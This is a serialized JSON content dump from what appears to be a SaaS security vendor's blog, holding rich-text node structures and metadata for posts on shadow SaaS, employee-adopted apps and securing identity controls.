",[],{},{"nodeType":178,"data":309263,"content":309264},{},[309265],{"nodeType":173,"value":309266,"marks":309267,"data":309268},"In some instances, we can prevent account security issues from occurring in the first place. When Push detects an employee creating a new account in their browser, we’ll guide them to set up strong identity and access controls on their account, at the first signup...",[],{},{"nodeType":312,"data":309270,"content":309274},{"target":309271},{"sys":309272},{"id":309273,"type":317,"linkType":318},"44U1ByoQns6vTqCSS3XrJf",[],{"nodeType":235,"data":309276,"content":309277},{},[309278,309282],{"nodeType":173,"value":309279,"marks":309280,"data":309281},"Get a handle on employee-adopted apps ",[],{},{"nodeType":173,"value":273597,"marks":309283,"data":309285},[309284],{"type":1646},{},{"nodeType":178,"data":309287,"content":309288},{},[309289],{"nodeType":173,"value":309290,"marks":309291,"data":309292},"By using Push, you can have complete visibility of all SaaS apps in your environment, including those adopted by employees without the oversight of IT and Security. We’ll automatically find the security issues that put your data at risk and enlist the support of employees to fix them. This allows you to embrace app self-adoption and adopt a default allow approach that enables your business while scaling security so you don’t lose control of SaaS security risks.  ",[],{},"Adapt your thinking to secure your data. Security needs to move from being the Department of No to the Department of Yes, Unless... ","2023-06-27T00:00:00.000Z",{"items":309296},[309297,309299],{"sys":309298,"name":26133},{"id":26132},{"sys":309300,"name":274157},{"id":274156},{"items":309302},[309303],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":309304},{"url":13981},{"__typename":1528,"sys":309306,"content":309307,"title":282544,"synopsis":282545,"hashTags":118,"publishedDate":282546,"slug":282547,"tagsCollection":309966,"authorsCollection":309972},{"id":281802},{"json":309308},{"nodeType":165,"data":309309,"content":309310},{},[309311,309317,309323,309329,309337,309343,309348,309354,309359,309365,309371,309377,309383,309389,309395,309401,309407,309413,309426,309432,309438,309443,309449,309455,309468,309485,309491,309497,309503,309509,309515,309521,309539,309545,309551,309557,309563,309569,309575,309581,309587,309600,309630,309638,309644,309650,309656,309662,309683,309689,309695,309701,309707,309713,309719,309725,309731,309736,309742,309748,309754,309764,309770,309776,309782,309787,309793,309799,309805,309826,309832,309838,309844,309857,309863,309869,309875,309932,309937,309943,309949,309955,309960],{"nodeType":178,"data":309312,"content":309313},{},[309314],{"nodeType":173,"value":281811,"marks":309315,"data":309316},[],{},{"nodeType":178,"data":309318,"content":309319},{},[309320],{"nodeType":173,"value":280354,"marks":309321,"data":309322},[],{},{"nodeType":178,"data":309324,"content":309325},{},[309326],{"nodeType":173,"value":281824,"marks":309327,"data":309328},[],{},{"nodeType":178,"data":309330,"content":309331},{},[309332],{"nodeType":173,"value":281831,"marks":309333,"data":309336},[309334,309335],{"type":370},{"type":1646},{},{"nodeType":178,"data":309338,"content":309339},{},[309340],{"nodeType":173,"value":281840,"marks":309341,"data":309342},[],{},{"nodeType":312,"data":309344,"content":309347},{"target":309345},{"sys":309346},{"id":280474,"type":317,"linkType":318},[],{"nodeType":178,"data":309349,"content":309350},{},[309351],{"nodeType":173,"value":281852,"marks":309352,"data":309353},[],{},{"nodeType":312,"data":309355,"content":309358},{"target":309356},{"sys":309357},{"id":280624,"type":317,"linkType":318},[],{"nodeType":178,"data":309360,"content":309361},{},[309362],{"nodeType":173,"value":281864,"marks":309363,"data":309364},[],{},{"nodeType":169,"data":309366,"content":309367},{},[309368],{"nodeType":173,"value":281871,"marks":309369,"data":309370},[],{},{"nodeType":178,"data":309372,"content":309373},{},[309374],{"nodeType":173,"value":281878,"marks":309375,"data":309376},[],{},{"nodeType":178,"data":309378,"content":309379},{},[309380],{"nodeType":173,"value":281885,"marks":309381,"data":309382},[],{},{"nodeType":169,"data":309384,"content":309385},{},[309386],{"nodeType":173,"value":281892,"marks":309387,"data":309388},[],{},{"nodeType":235,"data":309390,"content":309391},{},[309392],{"nodeType":173,"value":280712,"marks":309393,"data":309394},[],{},{"nodeType":178,"data":309396,"content":309397},{},[309398],{"nodeType":173,"value":281905,"marks":309399,"data":309400},[],{},{"nodeType":235,"data":309402,"content":309403},{},[309404],{"nodeType":173,"value":281912,"marks":309405,"data":309406},[],{},{"nodeType":178,"data":309408,"content":309409},{},[309410],{"nodeType":173,"value":281919,"marks":309411,"data":309412},[],{},{"nodeType":178,"data":309414,"content":309415},{},[309416,309419,309423],{"nodeType":173,"value":281926,"marks":309417,"data":309418},[],{},{"nodeType":173,"value":281930,"marks":309420,"data":309422},[309421],{"type":1646},{},{"nodeType":173,"value":10557,"marks":309424,"data":309425},[],{},{"nodeType":235,"data":309427,"content":309428},{},[309429],{"nodeType":173,"value":281941,"marks":309430,"data":309431},[],{},{"nodeType":178,"data":309433,"content":309434},{},[309435],{"nodeType":173,"value":281948,"marks":309436,"data":309437},[],{},{"nodeType":312,"data":309439,"content":309442},{"target":309440},{"sys":309441},{"id":280733,"type":317,"linkType":318},[],{"nodeType":235,"data":309444,"content":309445},{},[309446],{"nodeType":173,"value":280739,"marks":309447,"data":309448},[],{},{"nodeType":178,"data":309450,"content":309451},{},[309452],{"nodeType":173,"value":280746,"marks":309453,"data":309454},[],{},{"nodeType":178,"data":309456,"content":309457},{},[309458,309461,309465],{"nodeType":173,"value":281972,"marks":309459,"data":309460},[],{},{"nodeType":173,"value":281976,"marks":309462,"data":309464},[309463],{"type":1646},{},{"nodeType":173,"value":281981,"marks":309466,"data":309467},[],{},{"nodeType":178,"data":309469,"content":309470},{},[309471,309476,309480],{"nodeType":173,"value":281988,"marks":309472,"data":309475},[309473,309474],{"type":370},{"type":1646},{},{"nodeType":173,"value":281994,"marks":309477,"data":309479},[309478],{"type":1646},{},{"nodeType":173,"value":10557,"marks":309481,"data":309484},[309482,309483],{"type":370},{"type":1646},{},{"nodeType":178,"data":309486,"content":309487},{},[309488],{"nodeType":173,"value":282007,"marks":309489,"data":309490},[],{},{"nodeType":235,"data":309492,"content":309493},{},[309494],{"nodeType":173,"value":282014,"marks":309495,"data":309496},[],{},{"nodeType":178,"data":309498,"content":309499},{},[309500],{"nodeType":173,"value":282021,"marks":309501,"data":309502},[],{},{"nodeType":235,"data":309504,"content":309505},{},[309506],{"nodeType":173,"value":282028,"marks":309507,"data":309508},[],{},{"nodeType":178,"data":309510,"content":309511},{},[309512],{"nodeType":173,"value":282035,"marks":309513,"data":309514},[],{},{"nodeType":178,"data":309516,"content":309517},{},[309518],{"nodeType":173,"value":282042,"marks":309519,"data":309520},[],{},{"nodeType":178,"data":309522,"content":309523},{},[309524,309527,309536],{"nodeType":173,"value":282049,"marks":309525,"data":309526},[],{},{"nodeType":1698,"data":309528,"content":309531},{"target":309529},{"sys":309530},{"id":282056,"type":317,"linkType":318},[309532],{"nodeType":173,"value":28052,"marks":309533,"data":309535},[309534],{"type":194},{},{"nodeType":173,"value":197,"marks":309537,"data":309538},[],{},{"nodeType":178,"data":309540,"content":309541},{},[309542],{"nodeType":173,"value":282069,"marks":309543,"data":309544},[],{},{"nodeType":178,"data":309546,"content":309547},{},[309548],{"nodeType":173,"value":282076,"marks":309549,"data":309550},[],{},{"nodeType":169,"data":309552,"content":309553},{},[309554],{"nodeType":173,"value":282083,"marks":309555,"data":309556},[],{},{"nodeType":235,"data":309558,"content":309559},{},[309560],{"nodeType":173,"value":282090,"marks":309561,"data":309562},[],{},{"nodeType":178,"data":309564,"content":309565},{},[309566],{"nodeType":173,"value":282097,"marks":309567,"data":309568},[],{},{"nodeType":178,"data":309570,"content":309571},{},[309572],{"nodeType":173,"value":282104,"marks":309573,"data":309574},[],{},{"nodeType":235,"data":309576,"content":309577},{},[309578],{"nodeType":173,"value":282111,"marks":309579,"data":309580},[],{},{"nodeType":178,"data":309582,"content":309583},{},[309584],{"nodeType":173,"value":282118,"marks":309585,"data":309586},[],{},{"nodeType":178,"data":309588,"content":309589},{},[309590,309593,309597],{"nodeType":173,"value":282125,"marks":309591,"data":309592},[],{},{"nodeType":173,"value":280833,"marks":309594,"data":309596},[309595],{"type":1646},{},{"nodeType":173,"value":280838,"marks":309598,"data":309599},[],{},{"nodeType":250,"data":309601,"content":309602},{},[309603,309612,309621],{"nodeType":254,"data":309604,"content":309605},{},[309606],{"nodeType":178,"data":309607,"content":309608},{},[309609],{"nodeType":173,"value":280851,"marks":309610,"data":309611},[],{},{"nodeType":254,"data":309613,"content":309614},{},[309615],{"nodeType":178,"data":309616,"content":309617},{},[309618],{"nodeType":173,"value":280861,"marks":309619,"data":309620},[],{},{"nodeType":254,"data":309622,"content":309623},{},[309624],{"nodeType":178,"data":309625,"content":309626},{},[309627],{"nodeType":173,"value":280871,"marks":309628,"data":309629},[],{},{"nodeType":178,"data":309631,"content":309632},{},[309633],{"nodeType":173,"value":282169,"marks":309634,"data":309637},[309635,309636],{"type":370},{"type":1646},{},{"nodeType":178,"data":309639,"content":309640},{},[309641],{"nodeType":173,"value":280887,"marks":309642,"data":309643},[],{},{"nodeType":235,"data":309645,"content":309646},{},[309647],{"nodeType":173,"value":282184,"marks":309648,"data":309649},[],{},{"nodeType":178,"data":309651,"content":309652},{},[309653],{"nodeType":173,"value":282191,"marks":309654,"data":309655},[],{},{"nodeType":178,"data":309657,"content":309658},{},[309659],{"nodeType":173,"value":282198,"marks":309660,"data":309661},[],{},{"nodeType":250,"data":309663,"content":309664},{},[309665,309674],{"nodeType":254,"data":309666,"content":309667},{},[309668],{"nodeType":178,"data":309669,"content":309670},{},[309671],{"nodeType":173,"value":282211,"marks":309672,"data":309673},[],{},{"nodeType":254,"data":309675,"content":309676},{},[309677],{"nodeType":178,"data":309678,"content":309679},{},[309680],{"nodeType":173,"value":282221,"marks":309681,"data":309682},[],{},{"nodeType":178,"data":309684,"content":309685},{},[309686],{"nodeType":173,"value":282228,"marks":309687,"data":309688},[],{},{"nodeType":235,"data":309690,"content":309691},{},[309692],{"nodeType":173,"value":282235,"marks":309693,"data":309694},[],{},{"nodeType":178,"data":309696,"content":309697},{},[309698],{"nodeType":173,"value":282242,"marks":309699,"data":309700},[],{},{"nodeType":178,"data":309702,"content":309703},{},[309704],{"nodeType":173,"value":282249,"marks":309705,"data":309706},[],{},{"nodeType":169,"data":309708,"content":309709},{},[309710],{"nodeType":173,"value":282256,"marks":309711,"data":309712},[],{},{"nodeType":235,"data":309714,"content":309715},{},[309716],{"nodeType":173,"value":282263,"marks":309717,"data":309718},[],{},{"nodeType":178,"data":309720,"content":309721},{},[309722],{"nodeType":173,"value":282270,"marks":309723,"data":309724},[],{},{"nodeType":178,"data":309726,"content":309727},{},[309728],{"nodeType":173,"value":282277,"marks":309729,"data":309730},[],{},{"nodeType":312,"data":309732,"content":309735},{"target":309733},{"sys":309734},{"id":280936,"type":317,"linkType":318},[],{"nodeType":235,"data":309737,"content":309738},{},[309739],{"nodeType":173,"value":282289,"marks":309740,"data":309741},[],{},{"nodeType":178,"data":309743,"content":309744},{},[309745],{"nodeType":173,"value":282296,"marks":309746,"data":309747},[],{},{"nodeType":178,"data":309749,"content":309750},{},[309751],{"nodeType":173,"value":282303,"marks":309752,"data":309753},[],{},{"nodeType":178,"data":309755,"content":309756},{},[309757,309760],{"nodeType":173,"value":282310,"marks":309758,"data":309759},[],{},{"nodeType":173,"value":282314,"marks":309761,"data":309763},[309762],{"type":1646},{},{"nodeType":235,"data":309765,"content":309766},{},[309767],{"nodeType":173,"value":282322,"marks":309768,"data":309769},[],{},{"nodeType":178,"data":309771,"content":309772},{},[309773],{"nodeType":173,"value":282329,"marks":309774,"data":309775},[],{},{"nodeType":178,"data":309777,"content":309778},{},[309779],{"nodeType":173,"value":282336,"marks":309780,"data":309781},[],{},{"nodeType":312,"data":309783,"content":309786},{"target":309784},{"sys":309785},{"id":274541,"type":317,"linkType":318},[],{"nodeType":235,"data":309788,"content":309789},{},[309790],{"nodeType":173,"value":282348,"marks":309791,"data":309792},[],{},{"nodeType":178,"data":309794,"content":309795},{},[309796],{"nodeType":173,"value":282355,"marks":309797,"data":309798},[],{},{"nodeType":178,"data":309800,"content":309801},{},[309802],{"nodeType":173,"value":282362,"marks":309803,"data":309804},[],{},{"nodeType":250,"data":309806,"content":309807},{},[309808,309817],{"nodeType":254,"data":309809,"content":309810},{},[309811],{"nodeType":178,"data":309812,"content":309813},{},[309814],{"nodeType":173,"value":282375,"marks":309815,"data":309816},[],{},{"nodeType":254,"data":309818,"content":309819},{},[309820],{"nodeType":178,"data":309821,"content":309822},{},[309823],{"nodeType":173,"value":282385,"marks":309824,"data":309825},[],{},{"nodeType":235,"data":309827,"content":309828},{},[309829],{"nodeType":173,"value":282392,"marks":309830,"data":309831},[],{},{"nodeType":178,"data":309833,"content":309834},{},[309835],{"nodeType":173,"value":282399,"marks":309836,"data":309837},[],{},{"nodeType":178,"data":309839,"content":309840},{},[309841],{"nodeType":173,"value":282406,"marks":309842,"data":309843},[],{},{"nodeType":178,"data":309845,"content":309846},{},[309847,309850,309854],{"nodeType":173,"value":282413,"marks":309848,"data":309849},[],{},{"nodeType":173,"value":236043,"marks":309851,"data":309853},[309852],{"type":370},{},{"nodeType":173,"value":282421,"marks":309855,"data":309856},[],{},{"nodeType":235,"data":309858,"content":309859},{},[309860],{"nodeType":173,"value":282428,"marks":309861,"data":309862},[],{},{"nodeType":178,"data":309864,"content":309865},{},[309866],{"nodeType":173,"value":282435,"marks":309867,"data":309868},[],{},{"nodeType":178,"data":309870,"content":309871},{},[309872],{"nodeType":173,"value":282442,"marks":309873,"data":309874},[],{},{"nodeType":250,"data":309876,"content":309877},{},[309878,309887,309896,309905,309914,309923],{"nodeType":254,"data":309879,"content":309880},{},[309881],{"nodeType":178,"data":309882,"content":309883},{},[309884],{"nodeType":173,"value":273418,"marks":309885,"data":309886},[],{},{"nodeType":254,"data":309888,"content":309889},{},[309890],{"nodeType":178,"data":309891,"content":309892},{},[309893],{"nodeType":173,"value":282464,"marks":309894,"data":309895},[],{},{"nodeType":254,"data":309897,"content":309898},{},[309899],{"nodeType":178,"data":309900,"content":309901},{},[309902],{"nodeType":173,"value":273438,"marks":309903,"data":309904},[],{},{"nodeType":254,"data":309906,"content":309907},{},[309908],{"nodeType":178,"data":309909,"content":309910},{},[309911],{"nodeType":173,"value":282483,"marks":309912,"data":309913},[],{},{"nodeType":254,"data":309915,"content":309916},{},[309917],{"nodeType":178,"data":309918,"content":309919},{},[309920],{"nodeType":173,"value":273458,"marks":309921,"data":309922},[],{},{"nodeType":254,"data":309924,"content":309925},{},[309926],{"nodeType":178,"data":309927,"content":309928},{},[309929],{"nodeType":173,"value":282502,"marks":309930,"data":309931},[],{},{"nodeType":312,"data":309933,"content":309936},{"target":309934},{"sys":309935},{"id":282509,"type":317,"linkType":318},[],{"nodeType":178,"data":309938,"content":309939},{},[309940],{"nodeType":173,"value":282515,"marks":309941,"data":309942},[],{},{"nodeType":235,"data":309944,"content":309945},{},[309946],{"nodeType":173,"value":282522,"marks":309947,"data":309948},[],{},{"nodeType":178,"data":309950,"content":309951},{},[309952],{"nodeType":173,"value":282529,"marks":309953,"data":309954},[],{},{"nodeType":312,"data":309956,"content":309959},{"target":309957},{"sys":309958},{"id":282536,"type":317,"linkType":318},[],{"nodeType":178,"data":309961,"content":309962},{},[309963],{"nodeType":173,"value":37,"marks":309964,"data":309965},[],{},{"items":309967},[309968,309970],{"sys":309969,"name":274157},{"id":274156},{"sys":309971,"name":26133},{"id":26132},{"items":309973},[309974],{"fullName":282557,"firstName":282557,"jobTitle":118,"profilePicture":309975},{"url":282559},{"items":309977},[309978],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":309979},{"url":273636},{"json":309981,"links":310474},{"nodeType":165,"data":309982,"content":309983},{},[309984,309990,309996,310002,310016,310022,310027,310033,310039,310045,310051,310067,310073,310078,310084,310090,310111,310117,310123,310129,310135,310140,310146,310152,310160,310168,310174,310180,310186,310192,310198,310209,310215,310221,310227,310247,310277,310291,310301,310307,310313,310316,310322,310328,310334,310340,310346,310352,310358,310364,310370,310376,310382,310388,310394,310400,310406,310419,310435,310441,310447,310468],{"nodeType":178,"data":309985,"content":309986},{},[309987],{"nodeType":173,"value":298966,"marks":309988,"data":309989},[],{},{"nodeType":169,"data":309991,"content":309992},{},[309993],{"nodeType":173,"value":298973,"marks":309994,"data":309995},[],{},{"nodeType":178,"data":309997,"content":309998},{},[309999],{"nodeType":173,"value":298980,"marks":310000,"data":310001},[],{},{"nodeType":178,"data":310003,"content":310004},{},[310005,310008,310013],{"nodeType":173,"value":298987,"marks":310006,"data":310007},[],{},{"nodeType":173,"value":298991,"marks":310009,"data":310012},[310010,310011],{"type":1646},{"type":370},{},{"nodeType":173,"value":298997,"marks":310014,"data":310015},[],{},{"nodeType":178,"data":310017,"content":310018},{},[310019],{"nodeType":173,"value":299004,"marks":310020,"data":310021},[],{},{"nodeType":312,"data":310023,"content":310026},{"target":310024},{"sys":310025},{"id":280624,"type":317,"linkType":318},[],{"nodeType":178,"data":310028,"content":310029},{},[310030],{"nodeType":173,"value":299016,"marks":310031,"data":310032},[],{},{"nodeType":169,"data":310034,"content":310035},{},[310036],{"nodeType":173,"value":299023,"marks":310037,"data":310038},[],{},{"nodeType":178,"data":310040,"content":310041},{},[310042],{"nodeType":173,"value":299030,"marks":310043,"data":310044},[],{},{"nodeType":169,"data":310046,"content":310047},{},[310048],{"nodeType":173,"value":299037,"marks":310049,"data":310050},[],{},{"nodeType":178,"data":310052,"content":310053},{},[310054,310057,310064],{"nodeType":173,"value":299044,"marks":310055,"data":310056},[],{},{"nodeType":186,"data":310058,"content":310059},{"uri":280563},[310060],{"nodeType":173,"value":280566,"marks":310061,"data":310063},[310062],{"type":194},{},{"nodeType":173,"value":299055,"marks":310065,"data":310066},[],{},{"nodeType":178,"data":310068,"content":310069},{},[310070],{"nodeType":173,"value":299062,"marks":310071,"data":310072},[],{},{"nodeType":312,"data":310074,"content":310077},{"target":310075},{"sys":310076},{"id":280578,"type":317,"linkType":318},[],{"nodeType":169,"data":310079,"content":310080},{},[310081],{"nodeType":173,"value":299074,"marks":310082,"data":310083},[],{},{"nodeType":178,"data":310085,"content":310086},{},[310087],{"nodeType":173,"value":299081,"marks":310088,"data":310089},[],{},{"nodeType":246189,"data":310091,"content":310092},{},[310093,310102],{"nodeType":254,"data":310094,"content":310095},{},[310096],{"nodeType":178,"data":310097,"content":310098},{},[310099],{"nodeType":173,"value":299094,"marks":310100,"data":310101},[],{},{"nodeType":254,"data":310103,"content":310104},{},[310105],{"nodeType":178,"data":310106,"content":310107},{},[310108],{"nodeType":173,"value":299104,"marks":310109,"data":310110},[],{},{"nodeType":169,"data":310112,"content":310113},{},[310114],{"nodeType":173,"value":299111,"marks":310115,"data":310116},[],{},{"nodeType":178,"data":310118,"content":310119},{},[310120],{"nodeType":173,"value":299118,"marks":310121,"data":310122},[],{},{"nodeType":178,"data":310124,"content":310125},{},[310126],{"nodeType":173,"value":299125,"marks":310127,"data":310128},[],{},{"nodeType":178,"data":310130,"content":310131},{},[310132],{"nodeType":173,"value":299132,"marks":310133,"data":310134},[],{},{"nodeType":312,"data":310136,"content":310139},{"target":310137},{"sys":310138},{"id":280644,"type":317,"linkType":318},[],{"nodeType":178,"data":310141,"content":310142},{},[310143],{"nodeType":173,"value":299144,"marks":310144,"data":310145},[],{},{"nodeType":178,"data":310147,"content":310148},{},[310149],{"nodeType":173,"value":299151,"marks":310150,"data":310151},[],{},{"nodeType":178,"data":310153,"content":310154},{},[310155],{"nodeType":173,"value":299158,"marks":310156,"data":310159},[310157,310158],{"type":370},{"type":1646},{},{"nodeType":178,"data":310161,"content":310162},{},[310163],{"nodeType":173,"value":37,"marks":310164,"data":310167},[310165,310166],{"type":370},{"type":1646},{},{"nodeType":169,"data":310169,"content":310170},{},[310171],{"nodeType":173,"value":299175,"marks":310172,"data":310173},[],{},{"nodeType":178,"data":310175,"content":310176},{},[310177],{"nodeType":173,"value":299182,"marks":310178,"data":310179},[],{},{"nodeType":178,"data":310181,"content":310182},{},[310183],{"nodeType":173,"value":299189,"marks":310184,"data":310185},[],{},{"nodeType":169,"data":310187,"content":310188},{},[310189],{"nodeType":173,"value":299196,"marks":310190,"data":310191},[],{},{"nodeType":178,"data":310193,"content":310194},{},[310195],{"nodeType":173,"value":299203,"marks":310196,"data":310197},[],{},{"nodeType":178,"data":310199,"content":310200},{},[310201,310206],{"nodeType":173,"value":299210,"marks":310202,"data":310205},[310203,310204],{"type":1646},{"type":370},{},{"nodeType":173,"value":10557,"marks":310207,"data":310208},[],{},{"nodeType":178,"data":310210,"content":310211},{},[310212],{"nodeType":173,"value":299222,"marks":310213,"data":310214},[],{},{"nodeType":178,"data":310216,"content":310217},{},[310218],{"nodeType":173,"value":299229,"marks":310219,"data":310220},[],{},{"nodeType":169,"data":310222,"content":310223},{},[310224],{"nodeType":173,"value":299236,"marks":310225,"data":310226},[],{},{"nodeType":178,"data":310228,"content":310229},{},[310230,310233,310237,310240,310244],{"nodeType":173,"value":299243,"marks":310231,"data":310232},[],{},{"nodeType":173,"value":299247,"marks":310234,"data":310236},[310235],{"type":1646},{},{"nodeType":173,"value":299252,"marks":310238,"data":310239},[],{},{"nodeType":173,"value":299256,"marks":310241,"data":310243},[310242],{"type":1646},{},{"nodeType":173,"value":299261,"marks":310245,"data":310246},[],{},{"nodeType":250,"data":310248,"content":310249},{},[310250,310259,310268],{"nodeType":254,"data":310251,"content":310252},{},[310253],{"nodeType":178,"data":310254,"content":310255},{},[310256],{"nodeType":173,"value":299274,"marks":310257,"data":310258},[],{},{"nodeType":254,"data":310260,"content":310261},{},[310262],{"nodeType":178,"data":310263,"content":310264},{},[310265],{"nodeType":173,"value":299284,"marks":310266,"data":310267},[],{},{"nodeType":254,"data":310269,"content":310270},{},[310271],{"nodeType":178,"data":310272,"content":310273},{},[310274],{"nodeType":173,"value":299294,"marks":310275,"data":310276},[],{},{"nodeType":178,"data":310278,"content":310279},{},[310280,310283,310288],{"nodeType":173,"value":281972,"marks":310281,"data":310282},[],{},{"nodeType":173,"value":299304,"marks":310284,"data":310287},[310285,310286],{"type":1646},{"type":370},{},{"nodeType":173,"value":299310,"marks":310289,"data":310290},[],{},{"nodeType":178,"data":310292,"content":310293},{},[310294,310298],{"nodeType":173,"value":299317,"marks":310295,"data":310297},[310296],{"type":1646},{},{"nodeType":173,"value":10557,"marks":310299,"data":310300},[],{},{"nodeType":178,"data":310302,"content":310303},{},[310304],{"nodeType":173,"value":299328,"marks":310305,"data":310306},[],{},{"nodeType":178,"data":310308,"content":310309},{},[310310],{"nodeType":173,"value":299335,"marks":310311,"data":310312},[],{},{"nodeType":231,"data":310314,"content":310315},{},[],{"nodeType":169,"data":310317,"content":310318},{},[310319],{"nodeType":173,"value":299345,"marks":310320,"data":310321},[],{},{"nodeType":178,"data":310323,"content":310324},{},[310325],{"nodeType":173,"value":299352,"marks":310326,"data":310327},[],{},{"nodeType":235,"data":310329,"content":310330},{},[310331],{"nodeType":173,"value":299359,"marks":310332,"data":310333},[],{},{"nodeType":178,"data":310335,"content":310336},{},[310337],{"nodeType":173,"value":299366,"marks":310338,"data":310339},[],{},{"nodeType":178,"data":310341,"content":310342},{},[310343],{"nodeType":173,"value":299373,"marks":310344,"data":310345},[],{},{"nodeType":235,"data":310347,"content":310348},{},[310349],{"nodeType":173,"value":299380,"marks":310350,"data":310351},[],{},{"nodeType":178,"data":310353,"content":310354},{},[310355],{"nodeType":173,"value":299387,"marks":310356,"data":310357},[],{},{"nodeType":178,"data":310359,"content":310360},{},[310361],{"nodeType":173,"value":299394,"marks":310362,"data":310363},[],{},{"nodeType":178,"data":310365,"content":310366},{},[310367],{"nodeType":173,"value":299401,"marks":310368,"data":310369},[],{},{"nodeType":235,"data":310371,"content":310372},{},[310373],{"nodeType":173,"value":299408,"marks":310374,"data":310375},[],{},{"nodeType":178,"data":310377,"content":310378},{},[310379],{"nodeType":173,"value":299415,"marks":310380,"data":310381},[],{},{"nodeType":178,"data":310383,"content":310384},{},[310385],{"nodeType":173,"value":299422,"marks":310386,"data":310387},[],{},{"nodeType":235,"data":310389,"content":310390},{},[310391],{"nodeType":173,"value":299429,"marks":310392,"data":310393},[],{},{"nodeType":178,"data":310395,"content":310396},{},[310397],{"nodeType":173,"value":299436,"marks":310398,"data":310399},[],{},{"nodeType":178,"data":310401,"content":310402},{},[310403],{"nodeType":173,"value":299443,"marks":310404,"data":310405},[],{},{"nodeType":178,"data":310407,"content":310408},{},[310409,310412,310416],{"nodeType":173,"value":299450,"marks":310410,"data":310411},[],{},{"nodeType":173,"value":287551,"marks":310413,"data":310415},[310414],{"type":1646},{},{"nodeType":173,"value":299458,"marks":310417,"data":310418},[],{},{"nodeType":178,"data":310420,"content":310421},{},[310422,310425,310432],{"nodeType":173,"value":299465,"marks":310423,"data":310424},[],{},{"nodeType":186,"data":310426,"content":310427},{"uri":299470},[310428],{"nodeType":173,"value":28052,"marks":310429,"data":310431},[310430],{"type":194},{},{"nodeType":173,"value":299477,"marks":310433,"data":310434},[],{},{"nodeType":235,"data":310436,"content":310437},{},[310438],{"nodeType":173,"value":299484,"marks":310439,"data":310440},[],{},{"nodeType":178,"data":310442,"content":310443},{},[310444],{"nodeType":173,"value":299491,"marks":310445,"data":310446},[],{},{"nodeType":250,"data":310448,"content":310449},{},[310450,310459],{"nodeType":254,"data":310451,"content":310452},{},[310453],{"nodeType":178,"data":310454,"content":310455},{},[310456],{"nodeType":173,"value":299504,"marks":310457,"data":310458},[],{},{"nodeType":254,"data":310460,"content":310461},{},[310462],{"nodeType":178,"data":310463,"content":310464},{},[310465],{"nodeType":173,"value":299514,"marks":310466,"data":310467},[],{},{"nodeType":178,"data":310469,"content":310470},{},[310471],{"nodeType":173,"value":37,"marks":310472,"data":310473},[],{},{"entries":310475},{"hyperlink":310476,"inline":310477,"block":310478},[],[],[310479,310487,310493],{"sys":310480,"__typename":5345,"title":310481,"caption":310482,"layoutMode":118,"file":310483},{"id":280624},"New way of procuring software due to PLG","The new way of procuring software due to PLG",{"url":310484,"width":310485,"height":310486},"https://images.ctfassets.net/y1cdw1ablpvd/1bwMESg7gXQ5XsSYJax69u/664c3d2a124535c98c68e6d20432ce02/image__32_.png",1412,634,{"sys":310488,"__typename":5345,"title":310489,"caption":310490,"layoutMode":112585,"file":310491},{"id":280578},"PLG apps ","all those highlighted buttons are pure PLG, thanks Wes!",{"url":310492,"width":5358,"height":23894},"https://images.ctfassets.net/y1cdw1ablpvd/MV2eQBx7w1P93Iy1bUKVZ/c4145800c0d7bd807a355c776b830cc0/image9.png",{"sys":310494,"__typename":5345,"title":310495,"caption":310496,"layoutMode":112585,"file":310497},{"id":280644},"Security apps aren't PLG","Security apps definitely aren't PLG",{"url":310498,"width":310499,"height":173206},"https://images.ctfassets.net/y1cdw1ablpvd/5YlsuwLiMkAh8cGII7XKMK/0c3399eb63990cb92dd813bdd2ba0b52/image6.png",1864,"content:blog:free-and-trial-saas-applications-are-even-riskier-than-paid-apps.json","blog/free-and-trial-saas-applications-are-even-riskier-than-paid-apps.json","blog/free-and-trial-saas-applications-are-even-riskier-than-paid-apps",{"_path":310504,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":310505,"summary":310507,"title":284927,"subtitle":118,"metaTitle":310518,"synopsis":309293,"hashTags":118,"publishedDate":309294,"slug":284928,"ogImage":310519,"tagsCollection":310521,"relatedBlogPostsCollection":310527,"authorsCollection":311797,"content":311801,"_id":313238,"_type":5439,"_source":5440,"_file":313239,"_stem":313240,"_extension":5439},"/blog/protect-your-data-across-all-your-apps-even-the-ones-employees-use-without",{"id":283745,"publishedAt":310506},"2026-01-30T09:37:41.871Z",{"json":310508},{"data":310509,"content":310510,"nodeType":165},{},[310511],{"data":310512,"content":310513,"nodeType":178},{},[310514],{"data":310515,"marks":310516,"value":310517,"nodeType":173},{},[],"SaaS vendors want your employees to self-adopt their apps and start using them (and integrating with your data to do so). This leaves security and IT teams blind to which apps sensitive company data is flowing into. We’ll offer some practical guidance on how to manage supply chain risk without slowing down the business.","How to find and secure shadow SaaS",{"url":310520},"https://images.ctfassets.net/y1cdw1ablpvd/2G9eUljiJXW11zOTpqRSUk/0e41dc83190b8be5d6ea8ec58d83da90/blog_image.png",{"items":310522},[310523,310525],{"sys":310524,"name":26133},{"id":26132},{"sys":310526,"name":274157},{"id":274156},{"items":310528},[310529],{"__typename":1528,"sys":310530,"content":310531,"title":281786,"synopsis":281787,"hashTags":118,"publishedDate":281788,"slug":281789,"tagsCollection":311787,"authorsCollection":311793},{"id":280332},{"json":310532},{"nodeType":165,"data":310533,"content":310534},{},[310535,310541,310547,310553,310559,310565,310571,310577,310583,310622,310628,310634,310640,310646,310652,310657,310663,310669,310675,310682,310688,310694,310700,310706,310712,310718,310724,310740,310745,310751,310757,310767,310774,310780,310785,310791,310797,310802,310808,310816,310829,310850,310856,310862,310868,310874,310879,310885,310891,310897,310903,310909,310915,310931,310937,310943,310949,310955,310968,310998,311006,311012,311018,311024,311030,311036,311042,311048,311053,311059,311065,311071,311077,311083,311089,311105,311111,311116,311122,311143,311149,311155,311185,311191,311197,311203,311209,311221,311227,311287,311293,311299,311320,311325,311331,311337,311343,311373,311379,311720,311726,311742,311748,311756,311769,311775,311781],{"nodeType":169,"data":310536,"content":310537},{},[310538],{"nodeType":173,"value":258287,"marks":310539,"data":310540},[],{},{"nodeType":178,"data":310542,"content":310543},{},[310544],{"nodeType":173,"value":280347,"marks":310545,"data":310546},[],{},{"nodeType":178,"data":310548,"content":310549},{},[310550],{"nodeType":173,"value":280354,"marks":310551,"data":310552},[],{},{"nodeType":178,"data":310554,"content":310555},{},[310556],{"nodeType":173,"value":280361,"marks":310557,"data":310558},[],{},{"nodeType":178,"data":310560,"content":310561},{},[310562],{"nodeType":173,"value":280368,"marks":310563,"data":310564},[],{},{"nodeType":178,"data":310566,"content":310567},{},[310568],{"nodeType":173,"value":280375,"mark